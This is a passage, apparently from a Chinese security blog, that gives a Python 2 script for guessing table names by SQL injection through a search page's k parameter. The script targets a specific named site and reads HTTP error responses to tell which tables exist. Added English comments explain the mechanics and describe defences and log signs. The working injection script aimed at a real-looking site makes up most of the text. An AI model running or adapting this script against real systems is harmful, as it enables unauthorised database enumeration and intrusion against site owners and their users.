Access 的搜索型注入可参考这篇文章:
http://www.hack6.com/wzle/gf/2010/sousuoxingzhuruASP_ACCESS_82168216.html
写个 Python 脚本来猜表名(根据请求是否返回 HTTP 错误来判断表是否存在):
# -*- coding: utf-8 -*-
import urllib2
import urllib
# Python 2 script (urllib2, print statement, "except X,e" syntax).
# NOTE(review): the indentation of this listing was lost when the page was
# extracted; presumably everything from "dicstr=" through "pass" is the body
# of the for loop, the two lines after "try:" are the try body, and
# file.close() runs once after the loop.
#
# What it does: for each word in dic.txt it sends one GET request to a search
# page, with the word placed as a table name inside a
# "select count(*)from <word>" subquery appended to the k parameter. A
# response without an HTTP error status is taken to mean the table exists.
#
# Defender's view: this only works when the page concatenates k into its SQL
# text and lets database errors surface as HTTP error responses. Binding k as
# a query parameter removes the injection; returning the same generic response
# for failed queries removes the signal the script reads. In web logs this
# shows up as a run of requests to one search endpoint whose k value contains
# "select count(*)from" and differs only in one word, sent with urllib2's
# default User-Agent because the script sets no headers.
file=open("dic.txt","r") # load the wordlist of candidate table names
for fd in file.readlines():
# Drop the last character of the line, assumed to be the newline; a final
# line without a trailing newline loses a real character.
dicstr=str(fd[:-1])
url="http://www.hztaidu.com/NewsSearch.aspx?k="
# The leading quote presumably ends the string literal the page wraps around
# k, and the trailing "and '%'='" re-balances what follows it in the query.
# "%%" becomes a literal "%" after the % formatting.
para="'and(select count(*)from %s)>0 and '%%'='" % dicstr
finpara=urllib.quote(para) # percent-encode the fragment for the query string
finurl= url+finpara
try:
# urlopen raises HTTPError for an HTTP error status, so reaching the print
# means the request came back without one. The body read into "a" is never
# inspected.
a=urllib2.urlopen(finurl).read()
print "表名是:"+dicstr
except urllib2.HTTPError,e:
# Error status: treated as "no such table" and silently ignored.
pass
file.close()